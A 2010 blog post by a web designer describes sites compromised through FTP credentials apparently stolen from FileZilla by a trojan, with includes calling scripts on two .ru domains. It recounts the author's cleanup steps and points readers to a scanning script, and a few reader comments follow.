Inkrainbow/Pocketbloke Hackers

By Björn, August 18, 2010

Very recently I have been getting quite a lot of sites hacked by guys who leave an include in files like js and php files. This include calls a script from their own servers located at inkrainbow.ru and pocketbloke.ru.

I’m not entirely sure exactly what the script does, but it seems that they get into the sites via FTP. Which means that my PC must have been infected by a trojan which has been sending them my details. I have so far spoken to another developer and have also seen a comment on another blog post about the same guys, here, which suggest that the trojan targets Filezilla specifically and that way gets all the saved login details to your sites. If you follow that link to Nate Stillers blog you will get some good advice on what to look for.

What I have been doing up until now is just to download all images and template folders, delete the entire installation, then re-upload the images and template folders to the CMS systems. Then I go about changing all the FTP login details as well as the admin login details on the systems themselves.

So far I have had WordPress, Joomla and just plain html sites hacked. I have also downloaded a nifty little application called UnHackMe, which helps with detecting rootkits and trojans which your normal anti-virus won’t pick up.

Hope this helps someone as I have not seen many posts so far about these guys. I you have anything to add, please comment here or on Nate’s Blog post.

*Edit 19 August 2010* Nate developed a script that you can upload to your site and it will scan your entire site for this malicious code, find it here.

In: On the Web

Tags: hackers, rootkit, trojan, web design, Web Designer, web developer, web hosting

3 Responses to “Inkrainbow/Pocketbloke Hackers”

On August 18th, 2010 at 2:19 pm Dooks said,

Thanks for this I have been effected by this so its good to know that it is a problem with Filezilla
On August 19th, 2010 at 12:57 pm Björn said,

If you have AVG with LinkScanner installed it will block pages with these links on them!
On August 19th, 2010 at 9:53 pm Björn said,

Dooks, Nate developed a script that will scan your site for this malicious code. Find it at the post on his blog.

Grab my feed!

Categories

Tags
2010 World Cup blog bloggers Cape St Francis cape town cellphones christmas comedian dreamweaver earthdance Eastern Cape eskom Facebook FIFA World Cup Garden Route geeks Google html husky IBbala Malende IT LOGOS movies music MyStFrancis PE php port elizabeth Port St Francis rant & rave save-a-pet search engine optimisation SEO service South Africa spiritual travel St Francis Bay st francis links The Herald web design Web Designer web developer web hosting wikipedia windows vista
About Naughty Husky

I developed this site just for the fun of it. Everyone nowadays seems to have a blog. I also wanted one!

I own a site called Black Alsatian, named after my German Shepherd, Shanuk. Shanuk recently got a brother. His name is Joomla. Feeling guilty that Shanuk has a business named after her, I decided to make a plan. Joomla is a Husky, and a very naughty Husky I might add.
Just for fun (yeah right..)

Subscribe in a reader

A Web Designer's View – Port Elizabeth, St Francis Bay, South Africa

Inkrainbow/Pocketbloke Hackers

3 Responses to “Inkrainbow/Pocketbloke Hackers”

Leave a Reply

Categories

Tags

About Naughty Husky

Just for fun (yeah right..)

Archives

Pages